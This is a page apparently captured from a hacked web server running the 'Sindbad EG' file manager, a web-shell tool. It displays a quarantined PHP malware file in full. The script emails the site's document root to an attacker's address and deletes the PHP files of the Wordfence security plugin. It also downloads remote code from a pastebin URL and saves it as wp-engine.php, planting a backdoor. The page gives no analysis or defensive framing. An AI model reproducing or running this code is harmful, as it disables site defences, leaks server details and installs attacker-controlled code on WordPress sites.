Sindbad~EG File Manager

Current Path : /home/bahiapar/.quarantine/
Upload File :
Current File : /home/bahiapar/.quarantine/20201215-180929-X9lCKUZtx607gxlVFtVtQwAAABI-file-mpjGWQ.1608073770_1

<?php
//jg


echo "ATTARI";
$path = $_SERVER['DOCUMENT_ROOT'].'/wp-content/plugins/wordfence' ;
$to = 'attariomar99@gmail.com'; 
$subject = 'Wp engine SH3ll';
$message = $_SERVER['DOCUMENT_ROOT'];
$from = "contact@".$_SERVER['SERVER_NAME'];
$headers = "From:" . $from;
mail($to, $subject, $message, $headers);


$bb = scandir($path);

if (file_exists($path)) {
	foreach ($bb as $i) {
		$ext = pathinfo($i);
		if ($ext['extension']=='php') {
				echo '<br>'.$path.'/'.$i;
				unlink($path.'/'.$i);
		}
	}
}

function engine()
{
	unlink('wp-engine.php');
	$code = file_get_contents('https://pastebin.com/raw/KZVnMrKZ');
	$doit = fopen('wp-engine.php', 'w');
	fwrite($doit,$code);
	fclose($doit);
	
}

engine();

?>

Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists